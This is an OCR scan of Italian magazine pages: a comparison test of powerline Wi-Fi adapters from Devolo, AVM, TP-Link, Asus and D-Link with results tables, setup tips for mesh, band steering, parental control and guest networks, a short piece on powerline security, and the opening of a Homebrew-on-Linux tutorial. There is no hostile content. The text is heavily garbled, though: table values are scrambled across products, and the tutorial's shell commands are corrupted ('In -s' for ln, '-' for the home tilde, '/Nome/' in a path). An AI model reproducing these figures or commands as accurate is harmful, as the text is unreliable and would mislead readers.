(1300 MBPS) 


& Totalmente compatibile senza diminuzione di velocità O Compatibile, ma con perdita di velocità 2 Noncompatibile 


Gli altri candidati al test non of- 
frono nessun controllo paren- 
tale (Asus, D-Link) oppure so- 
lo alcune funzioni di protezio- 
ne (Devolo, TP-Link). Inoltre, 
ogni candidato al test consen- 
te di configurare una rete per 
ospiti, ad eccezione del D-Link 


DHP-W611AV. Apprezzabile 
anche che, quasi tutti gli adat- 
tatori, se richiesto, possano 
impostare il nome della WLAN 
e la password WLAN del rou- 
ter, tramite collegamento WPS. 
Malgrado numerosi tentativi, 
l’Asus PL-AC56 non è riuscito 
a copiare la WLAN del Fritz 
Box, anche se, a detta del pro- 
duttore, l'adattatore dovrebbe 
essere in grado di assolvere 
questa funzione. 


CONCLUSIONI 

Il Magic 2 WiFi di Devolo si è 
aggiudicato la vittoria in que- 
sta comparativa e nessun altro 
adattatore è in grado di offrire 


una velocità così elevata per la 
Powerline. Chi già utilizza adat- 
tatori Powerline dovrebbe so- 
stituirli con il Magic 2 per poter 
sfruttare il nuovo standard. Tut- 
to questo ha logicamente un 
costo, ma chi dispone di una 
veloce connessione Internet ed 
esegue in rete molti trasferi- 
menti di dati, potrà trarne dei 
vantaggi. Il Fritz Powerline 
1260E di AVM si è piazzato al 
secondo posto, grazie ad una 
potente WLAN e a numerose 
funzioni. La vittoria del rappor- 
to qualità/prezzo va all’econo- 
mico D-Link DHP-W611AV, in 
grado di offrire una velocità co- 
me si deve. 
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RISULTATI DEL TEST 


Come sono le prestazioni della powerline? 
Standard WLAN / frequenze / riconoscimento radar / sono disponibili tutti i canali ac 


Velocità max. trasferimento dati a 2,4 Gigahertz (n) in Mbps nei punti di misurazione 1 / 
2/3/4: in ricezione; in trasmissione 

Velocità max. trasferimento dati a 5 Gigahertz (ac) in Mbps nei punti di misurazione 1 / 
2/3/4:in ricezione; in trasmissione 

Ottimizzazione WLAN: con priorità per LAN / per dispositivo / per applicazione / 
possibilità di ridurre potenza di trasmissione per dispositivo / MU-MIMO / Band Steering 
| collegamento intelligente di dispositivi finali 

Scelta dinamica del canale di trasmissione 


Velocità trasferimento dati Powerline (Mbps): nel migliore dei casi / diversi circuiti di 
corrente / cavo lungo, guaina interrotta / cavo lungo, diversi sistemi / con dispositivi 
che creano disturbi 

Smorzamento segnali di disturbo sul cavo elettrico 

Tempo di ping nella trasmissione dati (con disturbi sulla linea elettrica) 

Porte LAN dell'adattatore WLAN (velocità) 


Quanto è affidabile la trasmissione dei dati? 
Criptazione per trasmissione dati via Powerline 


WLAN protetta dal produttore 


Quanto è semplice configurare l'adattatore? 


— ILDevolo Magic 2 WiFi utilizza i nuovi 


#* dispositivo dotato di connessione 


5 


DEVOLO 
MAGIC 2 WIFI 


Prezzo coppia: 200 euro 
http://bit.ty/wm262pt1 


chip in standard G.hn e tutto questo si 
avverte parecchio, poichè nelle prove 
questi adattatori hanno raggiunto 
attraverso la linea elettrica la velocità 
di quasi 700 Mbps! Anche la potenza 
della WLAN è buona, ma non di livello 
straordinario. Pratico: la tecnologia 
Mesh provvede a collegare il 


WLAN con l'adattatore più vicino. 


+ Velocità Powerline | 


elevatissima, buona 
potenza della WLAN 


Controllo parentale limita- 
to, non compatibile con 
vecchi adattatori 


Standard Powerline: G.hn 
Versione firmware: 5.2.1 


Powerline turbo, WLAN veloce 
n, ac/2,4+5GHz/si/si 


182/165/168/64; 

239 /231/271/98 

| 494/485/376/101; 

468 / 466 / 298 / 145 
no/no/no/no/ 

no/si / si (Fast Roaming) 


si 
686/296 /335/ 231/226 


40% 
10 millisecondi 
2 (1000 Mbps) 


Powerline e WLAN affidabili 
password individuale (128 Bit AES), 
facilmente modificabile 

WPA attiva, WPS con intervallo 
temporale 

Configurazione molto semplice 


| WLAN al top, Powerline ok 


Fair 


| AVM.FRITZP 

i f OWERLINE1260E 
Prezzo coppia: 132 euro 
| http://bit.ty/wm262pt2 


| Relativamente alla velocità della 

| Powerline, gli adattatori AVM non 
possono competere con i modelli al 
top di Devolo. In compenso, il 
produttore del Fritz Box è riuscito 
ugalmente a fare meglio della 
concorrenza offrendo una WLAN con 
una velocità di oltre 600 Mbps. 

| Aggiornando il Fritz Box alla versione 
Fritz 05 7.10 è possibile sfruttare la 
| funzione Mesh. 


| + WLAN potente, controllo 
I parentale, compatibile con 


FRitz Box 


Soggetta a interferenze, solo 
una porta LAN 
i  sull'adattatore 


Standard Powerline: 
Homeplug AV 
Versione firmware: Fritz 05 7.10 


n, ac/2,4+5GHz/si/no 


288/247 /212/124; 
231/178/131/77 

646 / 640 / 450/261; 

553 /432/ 396/161 
no/si/si/si/ 

no / si/ si (Access Point Steering) 


si 
406 / 217/198 / 201/137 


50% 
9 millisecondi 
1 (1000 Mbps] 


Cambio password difficoltoso 
password individuale (128 Bit AES) 


WPA attiva, WPS con intervallo 
temporale 
Configurazione molto semplice 


DEVOLO 

DLAN 1200+ WIFI AC 
Prezzo coppia: 155 euro 
http://bit.ty/wm262pt3 


Il modello top di Devolo della serie 
dLAN, la cui uscita risale a qualche 
anno fa, è ancora in grado di offrire 
una buona velocità per la 
Powerline. La WLAN è leggermente 
più lenta di quella offerta dai 
modelli al top testati. Ottimo: 
grazie ad un update del firmware, 
tutti i dispositivi dLAN verranno 
dotati della nuova funzione Mesh 


del Devolo Magic. 
Powerline veloce, 


* collegamento intelligente 
coni dispositivi finali 
WLAN un po' lenta, controllo 
parentale solo con limite tem- 
porale 


Standard Powerline: Homeplug AV 
Versione firmware: 5.2.1 


WLAN con lievi punti deboli 
n, ac/2,4+5GHz/si/si 


111/119/118/100; 


161/167/116/62 
325/319 /285/116; 
252 / 252] 254/173 

no /no/ no /no/ 

no / si / si (Fast Roaming 


si 
447 | 238 [175 | 283 [175 


50% 
10 mitlisecondi 
2 (1000 Mbps) 


Powerline e WLAN affidabili 
password individuale (128 Bit AES), 
facilmente modificabile 

WPA attiva, WPS con intervallo 
temporale 

Configurazione semplice 


Messa in servizio 
Istruzioni d'uso cartacee 
Semplicità di accesso alle impostazioni dell'adattatore 


LED di stato: collegamento con la rete / qualità collegamento Powerline / WLAN 
Assegnazione nome per rete WLAN: nome standard / nome facilmente impostabile / 
copia nome e password della WLAN del router via WPS 

Quanto è idoneo l'adattatore per l'uso quotidiano? 

Rete per utente ospite [accettata dal router) / seconda rete per dispositivi non sicuri 


Protezione si Internet / controllo parentale 
Aggiornamenti 


Consumo di un set di 2 adattatori in stand by: adatt. LAN / adatt. WLAN / costi annui 


Durata della garanzia / tipo di garanzia secondo indicazioni del produttore 


‘| richiamabili dal menu e 


molto semplice 

scarse, ma utili 

tramite digitazione IP e pagina web 
si/si/si 

| si/si/si 


| Controllo parentale misero 
si (no) / no 


no / poche funzioni 


automatizzabili 
2,1 Watt /5,9 Watt /19,62 Euro 


3 anni / sost. da parte del 


molto semplice 
scarse, ma utili 
tramite pagina web 
si/no/si 


i si/si/si 


Ottimo controllo parentale 
si (si) / no 
no / tutte le funzioni principali 


richiamabili dal menu e 
automatizzabili 
2,3 Watt / 5,8 Watt /19,87 Euro 


2 anni / sost. da parte del 


semplice 
scarse, ma utili 
tramite digitazione IP e pagina web 
si/si/si 

si/si/si 

Controllo parentale misero 
si (no} / no 


no / poche funzioni 


richiamabili dal menu e 
automatizzabili 
2,2 Watt / 5,1 Watt / 17,91 Euro 


3 anni / sost. da parte del 


produttore produttore produttore 
RISULTATI DEL TEST |! AAA AAA AA VA 
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TP-LINK 
TL-WPA8630P 
Prezzo coppia: 123.euro 
hitp://bit.ty/wm262pl4 


Gli adattatori di TP Link puntano 
tutto sulla velocità: i dati vengono | 
trasferiti rapidamente attraverso la | 
Powerline e la WLAN. Gli adattatori | 
dispongono di tre porte LAN Giga- 
bit. Scarseggia un po' il comfort di 
utilizzo, dato che Il collegamento 
Powerline è soggetto a interferen- 
ze. Il controllo parentale è misero 
e mancano le funzioni per ottimiz- 
zare la WLAN. 


+ Powerline e WLAN 
veloci, tre porte LAN 


Poche funzioni, 
Powerline molto 
soggette alle interferenze 


Standard Powerline: Homeplug AV 
Versione firmware: 2.0.2 Build 
20171020 Rel.67332 


Veloce, soggetta a interferenze 
n, ac /2,4 +5 GHz /no /no 


242/219 [190/76; 

297 [285/219 /196 
612/555/378/109; 
554 /539 / 399/140 

no/no/no/no/ 

no / no / no 


si 
467 / 218 / 243/253 /156 


60% 
8 millisecondi 
3 (1000 Mbps) 


Cambio password difficoltoso 
password individuale {128 Bit AES) 


\WPA attiva, WPS con intervallo 
temporale 

Configurazione semplice 
semplice 

scarse, ma utili 

tramite pagina web 

si/no/si 

si/si/si 


Controllo parentale misero 
si (no) / no 


no / pochissime funzioni 
richiamabili dal menu 


2,1 Watt /5,6 Watt / 18,89 Euro 
3 anni / sost. da parte del 


e) 


(TT ASUS 

| PL-AC56 

| Prezzo coppia: 132 euro 
http://bit.ty/wm262pl5 


| Sulle brevi distanze; l'Asus PL- 
: AC56 offre una buona velocità per 
la Powerline, ma sulle grandi 
| distanze, La concorrenza si rivela 
| molto più veloce. Altro neo: a 
ld detta del produttore il dispositivo 
| è in grado di copiare nome e 
i password del Router WLAN 
Fizan PS), ma nelle prove 
i conunFritz Box l'operazione non è 


| andata a buon fine. 
+ Velocità WLAN 
buona, tre porte LAN 
sull'adattatore WLAN 


Manca controllo parentale, 
impossibile ottimizzare la 


WLAN 


1 Standard Powerline: Homeplug AV 
| Versione firmware: 
pe 0-0-4.380_7645 


7 
I 
i 
Î 
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\VLAN buona, Powerline ok 
i n ac/2,4+5GHz/si/no 


A 198/201 /198 /89; 

| 237/2881222] 94 

| 551/522/362/103; 

| 618/446/347/42 

' no/no/no/no/ 

‘ no/no/no 

| si 

457 /181/144/129/121/ 


| 50% 

| 9 millisecondi 

| 3 (1000 Mbps) 

Cambio password difficoltoso 
| password individuale (128 Bit AES) 


\VPA attiva, WPS con intervallo 
temporale 

Non copia la WLAN del router 
| molto semplice 


| scarse, ma poco utili 
| tramite pagina web 

| si/no/si 
| si /si/no 


Manca controllo parentale 
| si(si)/no 

| no/no 

| da caricare manualmente 

| 2Watt/5,3 Watt / 17,91 Euro 


I 
i 3 anni / sost. da parte del 


@ 


peri 


D-LINK 
DHP-W611AV 
Prezzo coppia: 92 euro 
http://bit.ty/wm262pl6 


Tenuto conto del prezzo molto 
basso (rispetto la concorrenza), 


| gli adattatori di D-Link si sono ri- 
| velati sorprendenti per una buona | 
| potenza della Powerline e con 


prestazioni come si deve per la 
WLAN. Il produttore ha economiz- | 
zato sulle porte LAN, non offre il 
controllo parentale, una rete 
guest e mancano le funzioni per 


ottimizzare la WLAN. 
+ Buon rapporto qualità/ 
prezzo, velocità della 
Powerline 


Mancano rete 


per utente ospite 
e controllo parentale 


Standard Powerline: Homeplug AV 
Versione firmware: 1.01EU 


Powerline buona, WLAN ok 
n, ac /2,4+5 GHz/no/no 


176/174/170/88; 
185/192/154/84 
390 / 355 / 261/73; 
413 / 298 / 218 / 48 
no/si/no/no/no/no/no 


si 
420/294 /201/212/173 


40% 
9 millisecondi 
1 (1000 Mbps) 


Cambio password difficoltoso 
password individuale (128 Bit AES) 


\WPA attiva, WPS con intervallo 
temporale 

Non copia WLAN del router 
semplice 

scarse ma poco utili 

tramite pagina web 


| si/no/si 
{ si/si/no 


Manca rete per utente ospite 
no / no 


no / no 
richiamabili dal menu 


1,6 Watt /5 Watt / 16,19 Euro 


2 anni / sost. da parte del 


miu 


| 7 DEVOLO 

| MAGIC 1 WIFI 

| Prezzo coppia: 180 euro 
http://bit.ly/wm262pt7 


| Comei i modelli Magic 2, anche gli 
| adattatori più economici Magic 1 
| utilizzano i veloci chip in standard 
| G.hn. Con questi adattatori però, De- 
| volo non è stato molto generoso: le 
| porte LAN supportano una velocità 
solo fino a 100 MBps e tutto questo 
| fa sì che gli adattatori non sono in 
| grado di trasferire velocemente i da- 
| ti Internet del router, nè via Powerli- 
| ne, nè attraverso la WLAN. 
+ Configurazione semplice, 
collegamento intelligente 
dei dispositivi 


La porta LAN limita velocità 
dati Internet a 100 Mbps 


Î 
I 
| 
I 


Standard Powerline: G.hn 
Versione firmware: 5.2.1 


La porta LAN limita la velocità 
n,ac/2,4+5GHz/si/si 


88/89/88/75; 
95/94/93/86 
88/89/89 /88; 
95/95/95/95 
no/no/no/no/ 

no / si /‘si Fast Roaming) 


si 
93/93/93/93/92 


smorzamento minimo 
26 millisecondi 
2.(100 Mbps) 
Powerline e WLAN affidabili 
password individuale (128 Bit AES), 
facilmente modificabile 

WPA attiva, WPS con intervallo 
temporale 

Configurazione semplicissima 
molto semplice 

scarse ma utili 

digitando IP e ntramite pagina web 
si/si/si 

si/si/si 


Controllo parentale misero 
si (no) / no 
no / poche funzioni 


richiamabili dal menu e 
automatizzabili 
1,7 Watt / 4,3 Watt / 14,72 Euro 


3 anni / sost. da parte del 


cl Sale 
DEVOLO 
DLAN 550+ WIFI 
Prezzo coppia: 102 euro 
http://bit.ly/wm262pt8 
A causa di una porta LAN lenta, il 
Devolo dLAN 550+ WiFi 


è in grado di trasferire dati 
Internet solo alla velocità max. di 
100 Mbps. Per la connessione 
WLAN utilizza tra l'altro solo la 
sovraccarica banda di frequenza a 
2,4 Gigahertz ed è quindi elevata 
la probabilità che altre reti 
adiacenti possano intromettersi e 
creare interferenze. 


+ 


semplici 


Velocità limitata della porta 
LAN, WLAN solo a 24 
Glgahertz 


Basso consumo energetico, 
configurazione e usabilità 


Standard Powerline: Homeplug AV 
Versione firmware: 5.2.1 


La porta LAN limita la velocità 
n/2,4 6Hz/-/- 


88/88/76/46; 
95/94/93/88 
non supporta banda a 5 GHZ 


no /no/no/no/no/ 
- ] si (Fast Roaming) 


si 
95/95/95/95/77 


20% 

10 millisecondi 
1 (100 Mbps) 
Powerline e WLAN affidabili 
password individuale (128 Bit AES), 
facilmente modificabile 

WPA attiva, WPS con intervallo 
temporale 
Configurazione semplice 
semplice 

scarse ma utili 

digitando IP e tramite pagina web 
si/si/si 

si/si/si 


Basso consumo energetico 
si (no) / no 
no / poche funzioni 


richiamabili dal menu e 
automatizzabili 
1,5 Watt / 3,4 Watt / 12,02 Watt 


3 anni / sost. da parte del 


produttore i rivenditore produttore produttore produttore 
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TRUCCHI 
PER ADATTATORI 
POWERLINE 


MESH, CONTROLLO PARENTALE, RETE PER OSPITI: 
BASTANO ALCUNE OPERAZIONI PER OTTENERE IL MEGLIO DAI 
NOSTRI ADATTATORI POWERLINE. 


SCEGLIERE LA PRESA 

ELETTRICA GIUSTA 
Per prima cosa provvediamo a collegare il router e a inserire gli 
adattatori. La configurazione di gran parte degli adattatori Powerline 
è semplicissima. Affinché il trasferimento dati possa avvenire 
agevolmente attraverso la linea elettrica, gli adattatori ed altri 
apparecchi elettrici devono essere inseriti nella presa giusta. 


Meglio una presa elettrica integrata 

Inseriamo sempre l'adattatore Powerline direttamente nella presa e 

non in una ciabatta, poiché spesso le prese multiple presentano un 
filtro antidisturbo che può filtrare le frequenze della Powerline e nei 
casi peggiori, la velocità di trasferimento dati può calare notevolmente. 
Possono procurare disturbi anche dispositivi inseriti nelle prese 
adiacenti. Nel caso dovessero mancare degli slot, provvediamo ad 
acquistare un adattatore con presa integrata, dove potremo inserire la 
nostra ciabatta. Gli adattatori con presa integrata dispongono di un filtro 
antidisturbo, che consente di far funzionare senza difficoltà i dispositivi 
collegati. Suggerimento extra: se non siamo soddisfatti della velocità, 
inseriamo per prova gli adattatori in altre prese elettriche presenti nella 
stanza. 


2 COPIARE LE IMPOSTAZIONI 
WLAN DEL ROUTER 
Funzione pratica: se il nostro router è in grado di trasferire i dati 
via WPS, numerosi adattatori Powerline sono in grado di memorizzare 
il nome della WLAN e la password WLAN del router. In questo modo, 
possiamo creare una rete omogenea, dato che numerose reti con 
impostazioni differenti si rivelano poco pratiche. 


Clonare le impostazioni via WPS 

Provvediamo a premere il tasto WPS presente sul nostro router (Tasto 
“Connect per i nuovi Fritz Box). Successivamente, premiamo il tasto sul nostro 
adattatore Powerline: 

® AVM: tasto Connect 

® Devolo: Tasto con la casetta 

e TP-Link: tasto WiFi 

® Asus: tasto Clone (nelle prove con un router Fritz Box non 

ha funzionato) 


se 
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SRICHIAMARE | MENU 

DEGLI ADATTATORI 
Per applicare le impostazioni agli adattatori Powerline, 
provvediamo ad accedere al menu dei dispositivi. A 
seconda del produttore, esistono modalità diverse per 
eseguire questa operazione. 


Via browser, software o App 

Collegate il nostro adattatore al dispositivo finale, via WLAN o 
cavo LAN. Con gli adattatori Devolo, digitiamo l'indirizzo IP nella 
barra degli indirizzi del nostro browser. Nel menu possiamo trovare 
il nostro router. Se qualche utente giudica complicata questa 


operazione, potrà installare il software Devolo Cockpit (scaricabile 
per Windows, Mac e Linux dalla pagina Internet del produttore), 
clicchiamo su Adattatore WiFi nella home page e selezioniamo 

il Simbolo con freccia e ingranaggio. Con adattatori di altri 
produttori, digitiamo il seguente URL nella barra degli indirizzi del 
browser: 

© AVM http://fritz.powerline 

e Asus http:// ap.asus.com 

e TP-Link http://tplinkplc.net 

e per l'adattatore D.Link usiamo l'indirizzo riportato nella scheda 
allegata per la configurazione. Gli adattatori Powerline di Devolo 

e TP-Link possono essere gestiti in alternativa anche via App con 
uno smartphone Android o iPhone. L'App di Devolo si chiama “Home 
Network", mentre quella di TP-Link è denominata “tpPLC”. 


UTILIZZO DELLA 

FUNZIONE MESH 
Alcuni adattatori Powerline collegano intelligentemente i dispositivi 
finali: grazie alla funzione Mesh “Access Point Steering (AVM) o 
“Fast Roaming (Devolo), i dispositivi finali vengono sempre collegati 
all’adattatore più vicino. 


Attivazione dell'Access Point Steering / Fast Roaming 

Con gli adattatori AVM necessitiamo di un router Fritz Box con sistema 
operativo versione Fritz 0S 7.10 o più nuova. Premiamo per prima cosa 
il tasto WPS / Connect sul router e successivamente il tasto Connect 
del Fritz Powerline 1260E. L'adattatore imposterà automaticamente la 
funzione Mesh del Fritz Box. Con gli adattatori Devolo, richiamiamo il 
menu e a selezioniamo WiFi e Mesh-WLAN. Dalla voce Mesh-WLAN 
clicchiamo su Attivare e su Funzioni alla voce IEEE802.11r. Salviamo 
le modifiche con un clic sul Simbolo del dischetto. 


® Ubersicht 


Mesh-WLAN 


Status 


WiFi-Netzwerke Mesh-Funktionalitàt optimiert Ih 
mit fest hàngenden WiFi-Geràte 
Gastnetawerk viele WiFi-Geràte. Airtime Fairneg - 


Mesh-WLAN 


Zeitsteuerung 


Einschalten 


ATTIVARE IL BAND STEERING 


{CAMBIO DI FREQUENZA) 


Straordinaria funzione per ottimizzare la WLAN: la funzione di Band Steering 
imposta automaticamente sui terminali, la banda di frequenza da 2,4 0 5 Gigahertz, 


scegliendo quella che è più veloce, 


Cambio automatico della banda di frequenza 


Affinché il Band Steering possa 
funzionare, le bande di frequenza da 2,4 
e 5 Gigahertz devono avere lo stesso 
nome e la stessa password. Con gli 
adattatori AVM, eseguiamo queste 
impostazioni: clicchiamo dal menu su 
WLAN e rete wireless, eliminiamo 

il segno di spunta da Nome diverso 
per reti wireless a 2,465 GHz e 
selezioniamo Applica. Con gli adattatori 
Devolo, clicchiamo su WiFi e Rete Wifi, 
su 2,4 GHz + 5 GHz, poi su Stesse 
impostazioni e successivamente sul 
simbolo del dischetto. Per attivare 

il Band Steering con gli adattatori 


CONFIGURARE 
IL CONTROLLO PARENTALE 


AVM, clicchiamo ora sulle voci WLAN, 
canale wireless, altre impostazioni. 
Per migliorare il trasferimento dei 
dati, i dispositivi WLAN devono 
automaticamente passare alle 
frequenze 2,4 e 5 GHz e devono poter 
essere gestiti numerosi dispositivi 
Fritz attraverso la funzione Mesh, poi 
clicchiamo su Applica. Con i dispositivi 
Devolo, selezionate WiFi, Mesh-WLAN, 
Attiva e poi sul simbolo del dischetto. 


Funknetz-Name 


Geben Sie zur besseren Unterscheidung von anderen WLAN-Funknetzen Ihre: 


Name des WLAN-Funknetzes (SSI0) FRITZIBOx 7590YC TK 
 Unterschiedliche Benennung der Funknetze auf 2,4 und 5 GHz 


€ Name des WLAN-Funknetzes sichtbar 


Vogliamo che i vostri figli non stiano seduti-troppo a lungo davanti al PC? E 
navigando su Internet, vogliamo che non vengano aperte pagine con contenuti 
pericolosi per i giovani? Impostando il controllo parentale, si elimineranno 
tutti questi problemi. Gli adattatori Powerline di AVM collegati a router Fritz 
Box possono utilizzare l'esteso controllo parentale offerto da questi router. 
Gli adattatori Devolo offrono invece questa funzione solo per un determinato 


periodo di tempo. 


Blocca le pagine, limita il tempo 
Se con gli adattatori AVM vogliamo 
bloccare pagine Internet, dal menu di 
Fritz Box clicchiamo su Internet, Filtro 
e dalla scheda di registro su Elenco. 

Da qui, possiamo bloccare l'accesso 

a determinate pagine (black list) o 
limitare l'accesso solo ad alcune pagine 
{white list). Possiamo inoltre bloccare 
programmi, come Skype o Steam. 
Creiamo per i nostri figli uno o più profili 
di accesso nella scheda di registro. 
Clicchiamo poi su Nuovo profilo di 
accesso. Possiamo limitare l'utilizzo 

di Internet per un periodo di tempo 
predeterminato e/o stabilire un piano 
temporale, nel caso in cui i nostri figli 


sii incersicherung 
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VaFi-Netowerke 


vogliano organizzare il tempo da passare 
in rete. È anche possibile applicare 
blocchi a pagine Internet e programmi. 
Provvediamo a bloccare anche l'uso di 

un accesso in qualità di ospite, per non 
lasciare dei buchi. Poi, inseriamo nella 
scheda di registro il Controllo parentale 
nel Profilo di accesso, che dovrà essere 
applicato per la sicurezza dei bambini. 
Con gli adattatori Devolo, clicchiamo su 
WiFi, controllo parentale, Attiva e sul 
Simbolo +. Dalla voce Tempo, scegliamo 
un periodo di tempo per l'accesso a 
Internet e digitiamo poi su Tempo a 
disposizione, il tempo consentito per 
l'accesso a Internet. 


AVM: ASSEGNARE 

PRIORITA AI DISPOSITIVI 
Stiamo riproducendo un video in streaming e il film si blocca 
continuamente? Oppure, stiamo giocando su Internet, ma 
improvvisamente il collegamento inizia a diventare lento? 
Tutto questo può succedere se nella stessa abitazione 
parecchie persone utilizzano contemporaneamente la 
connessione Internet. Possiamo porvi rimedio in questo 
modo: attribuiamo una priorità a determinati servizi o 
all'uso di dispositivi. La funzione per attribuire una priorità 
offerta dai router Fritz Box può trovare impiego anche sugli 
adattatori Powerline di AVM. 


Autorizzare o bloccare l’uso di dispositivi 

Dal menu di Fritz Box cliccate su Internet e su Filtro. Accediamo alla 
voce Priorità e dalla voce Applicazioni in tempo reale clicchiamo su 
Nuova regola. Clicchiamo poi su Tutti i dispositivi e selezioniamo 
dall'elenco, il dispositivo a cui vogliamo attribuire priorità. Possiamo 
assegnare la priorità anche ad un programma. Clicchiamo ora su OK. 
Dalla voce Priorità e Applicazioni in background, possiamo anche 
bloccare dispositivi e programmi. 


AleGerite ____B 


Geben Sie die Netzwerkanwendung an: 


Surfen oe = i ei 


18 CONFIGURARELA WLAN. 


PER L'UTENTE OSPITE 
Con pochi clic, possiamo aprire una rete WLAN sicura 
e criptata per i nostri ospiti, affinché i vostri amici 
possano, ad esempio, avere accesso alle loro mail. La 
connessione WLAN per l'utente ospite è separata dalla 
rete wifi dell'abitazione. 


Attivare un hotspot per gli ospiti 

Con gli adattatori di Devolo, dobbiamo selezionare dal menu le 
voci WiFi, Rete per ospite e Attiva. Scegliamo ora un nome per 
la rete ed eventualmente una password. Salviamo le Impostazioni 
cliccando sul simbolo del dischetto. Con gli adattatori AVM 
selezioniamo dal menu le voci: WLAN Accesso ospite, Accesso 
ospite attivo e accesso privato per ospite alla WLAN nel caso 
vogliamo inserire una password, oppure clicchiamo su Hotspot 
WLAN pubblico, se non volete assegnare alcuna password alla 
rete. Dalla voce Accesso WLAN per ospite/Hotspot, inseriamo 
un nome ed eventualmente una password. Confermiamo con un 
clic su Applica. 


Das Gastnetzwerk lasst nur den Zugriff auf das Internet zu. 
Frequenzband: | 2,4 GHz +5GH2 
Netzwerkname: | devolo-guest-265 


Verschidsselung: RAZZA ZU IZ 00 


Ein Schitssel ist erforderlich: entweder eine “Passphrase* mit einer Longe von 8 bis 63 Zeici 
tnt einer Lange von 64 Zeschen. 
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La sicurezza della Power Line 


I semplici quadri elettrici, con 
salvavita e magnetotermico, non 
filtrano i dati, quindi pure avendo 
due quadri elettrici diversi si 
condivide la stessa linea BPL. 
Questo è un problema negli edifici 
= più vecchi, con impianti elettrici 
Sr "irregolari" oppure in grandi 
= edifici nei quali è 
=, presente un solo 
& contatore. 


> 


I contatori della corrente 
interrompono il flusso dei 
dati BPL (Broadband on 
Power Line), quindi chi è 
al di fuori del nostro 
contatore non ci può 
intercettare. 7, 


NY 


ti 
i 
i 
I 


La maggioranza dei dispositivi in commercio offre la crittografia. 

Non è sempre abilitata di default, e a volte usa una chiave prestabilita 
che non è molto sicura. Conviene sempre abilitare la crittografia e 
scegliere una chiave crittografica casuale. Questo perché è in teoria 
sempre possibile che il proprio segnale BPL venga disperso su uno dei 
cavi, anche solo sotto forma di frequenze radio a causa degli impulsi 
su cavi di rame non schermati, e quindi intercettato da altre persone 
nello stesso edificio. 


200 
30 @® Linux Magazine 


Le tecniche di scatto 
e i software giusti per ottenere. 
foto d' ‘autore con PC e smartphone 


EASYTECH COLLECTION 


BOOKMAGA 


| trucchi e le impostazioni segrete per 
ottenere scatti perfetti e usare al meglio 
Action Cam, digicam a 360° e Droni 


giusti per ottenere 
rtphone 


| tool e le procedure per modificare, 
È . li p . . 
correggere e migliorare i propri 
asso pas SERIA SI 
o ne “estreme n i actioncem scatti digitali 
© Fotografare © 
@ Photoshop !N 
Filtri & PIUEN 
© L'esperto sponde 


Le guide passo passo per usare 
al meglio il software di fotoritocco 
numero 1 al mondo 


o trovi in edicola! 2" 


; Tips & Tricks 


E Trucchi e consigli per usare subito GNU/Linux da vero esperto. 
Scoprire le strategie e gli strumenti giusti per trovare una soluzione rapida 
a tutti i problemi e sfruttare appieno le potenzialità del sistema e delle applicazioni 


LEGENDA 
DATABASE 


[6] SVILUPPO 


Benvenuto in phpMyAdmin 
Lingua » Language 


Italiano » Italian 


CREARE AMBIENTE 
INDIPENDENTE 

5%. Homebrew (https:/brew.sh} è 
fà un progetto open source nato 
nel 2009, noto a chi utilizza il MacOS 
poiché molti utenti lo adottano come 
sistema di gestione dei pacchetti nei 
computer di casa Apple. Da 
Homebrew venne fatto il fork 
Linuxbrew, ma dal rilascio della sua 
versione 1.9.4 è stato accorpato alla 
versione 2 di Homebrew. Oggi, quindi, 
si ha un solo programma per MacOS 
e GNU/Linux che permette 
l'installazione in automatico di 
software da sorgenti e/o precompilato, 
utile quando non si ha un pacchetto 
per la distribuzione in uso o quando 
quello presente nei repository risulta 
datato. L'applicativo è scritto in Ruby, 
linguaggio di programmazione a 
oggetti nato nel 1995, http://bit.ly/ruby- 
lang. Pertanto assicuriamoci di averlo 
installato unicamente al software Git 
(htip://bit.ly/scem-gi) entrambi presenti 
nei repository di ogni distribuzione. 
Nel seguito illustreremo 
un'installazione generica valida per 
tutte le distribuzioni. Poiché di default 
Homebrew si aspetta l'installazione in 
/home/linuxbrew/.linuxbrew creiamo 
un nuovo utente (fittizio e senza 
password) in /home utilizzando, con i 
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permessi dell’amministratore, il 
comando useradd -m linuxbrew 
(man useradd per approfondimenti) 
modificandone proprietario e gruppo 
di appartenenza per farli coincidere 
con il nostro nome utente chown 
nome_utente:nome_utente /home/ 
linuxbrew/ (man chown). Cloniamo il 
repositorio Homebrew con git clone 
https://github.com/Homebrew/brew 
/home/linuxbrew/.linuxbrew/Homebrew 
seguito da mkdir /home/linuxbrew/. 
linuxbrew/bin per creare la cartella 
bin nella cartella nascosta .linuxbrew 
e In -s ..Homebrew/bin/brew 
/home/linuxbrew/.linuxbrew/bin che 
crea un link simbolico nella cartella bin 
all’'eseguibile dell’applicazione. Per 
aggiungere l'eseguibile brew al 
campo di visibilità della shell è 
sufficiente eval $(/home/linuxbrew/. 
linuxbrew/bin/brew shellenv), help 
eval per approfondimenti. È, però, una 
soluzione temporanea che viene persa 
nel momento in cui si chiude la shell 
pertanto andrebbe impartito ogni 
volta. Per un collegamento 
permanente dobbiamo aggiungere il 
precedente comando al file .bash_ 
profile accodandolo con echo 'eval 
$(/Nome/linuxbrew/.linuxbrew/bin/ 
brew shellenv)' >>-/.bash_profile 
(ricordiamo che la tilde “-” sta ad 


indicare il percorso della home utente). 
A questo punto l'eseguibile brew è 
visibile dalla shell dell'utente nome_ 
utente pronti per un test con brew 
install hello. Vedremo dapprima 
l'installazione del repository 
homebrew/core (quelli installati si 
visualizzano con brew tap e vengono 
memorizzati in /home/linuxbrew/. 
linuxbrew/Homebrew/Library/ 
Taps/) seguita dal recupero dei 
pacchetti necessari al sorgente hello 
che al termine potremo lanciare 
direttamente dalla shell con hello (è 
solo un test di compilazione che 
mostra il classico “Salve, mondo!”). In 
Homebrew la costruzione dei 
programmi si basa su Formule, script 
in Ruby che contengono i passi da 
seguire: dalla risoluzione delle 
dipendenze alla compilazione dei 
sorgenti o prelievo delle versioni 
bottles. Per certi versi ricordano gli 
script stackbuild della distribuzione 
Slackware (http://www.slackware.com). 
L'applicativo, creerà la cartella 
-/.cache/Homebrew nella home 
nome_utente mentre i programmi 
verranno installati in /home/ 
linuxbrew/.linuxbrew. Tra le 
“formule” di Homebrew c'è tutto il 
necessario per creare un completo 
sistema LAMP (Linux-Apache- 
MySQL-PHP) con phpMyAdmin 
(htip://bit.ly/phpmyadm) per la gestione 
del database. Una sostanziale 
differenza tra Appimage e Homebrew 
consiste nei tempi per avere 
l'applicazione pronta al lancio. 

Il software pacchettizzato 

con Appimage può essere 
immediatamente lanciato poiché 
qualcuno ha già provveduto alla sua 


compilazione e pacchettizzazione, 
quindi il tempo di attesa equivale a 
quello del caricamento in RAM. Per 
Homebrew occorrerà attendere il 
download, l'eventuale compilazione 
